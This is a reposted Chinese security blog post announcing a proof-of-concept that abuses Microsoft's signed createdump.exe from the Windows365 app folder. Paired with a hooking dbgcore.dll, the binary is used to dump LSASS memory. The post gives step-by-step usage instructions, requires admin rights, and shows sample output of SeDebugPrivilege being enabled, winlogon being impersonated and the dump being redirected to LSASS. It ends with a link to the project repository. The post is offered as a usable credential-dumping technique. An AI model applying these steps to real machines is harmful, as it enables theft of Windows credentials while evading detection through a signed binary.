利用 WindowsApp createdump 工具获取 lsass 转储

admin 2024年9月23日14:30:26评论12 views字数 1598阅读5分19秒阅读模式

利用 WindowsApp createdump 工具获取 lsass 转储

该项目演示了如何使用createdump.exe工具(Microsoft 签名的可执行文件)从 Windows 应用程序中转储 LSASS 进程,利用自定义挂钩来启用进程访问LSASS。

Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnccreatedump.exe')

    Directory: C:Program FilesWindowsAppsMicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwewnc

SignerCertificate Status StatusMessage Path
----------------- ------ ------------- ----
C2048FB509F1C37A8C3E9EC6648118458AA01780 Valid Signature verified. createdump.exe

如何使用

  1. 将 createdump 从 WindowsApp 文件夹复制到所选文件夹 ( copy C:Program FilesWindowsAppsMicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwewnccreatedump.exe .)

  2. dbgcore.dll将此 repo放置在同一个文件夹中

  3. 执行 createdump (可选择提供参数)

注意:需要管理员权限。

输出应该是这样的:

c:work_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump

Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:UsersmeAppDataLocalTempdump.35828.dmp
MiniDumpWriteDump called with:
  ProcessId: 35828
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:WindowsSystem32DbgCore.dll
Calling original with:
  ProcessId: 1512
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.

项目地址:

https://github.com/rweijnen/createdump

原文始发于微信公众号(Ots安全):利用 WindowsApp createdump 工具获取 lsass 转储

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月23日14:30:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用 WindowsApp createdump 工具获取 lsass 转储http://cn-sec.com/archives/3197390.html

发表评论

匿名网友 填写信息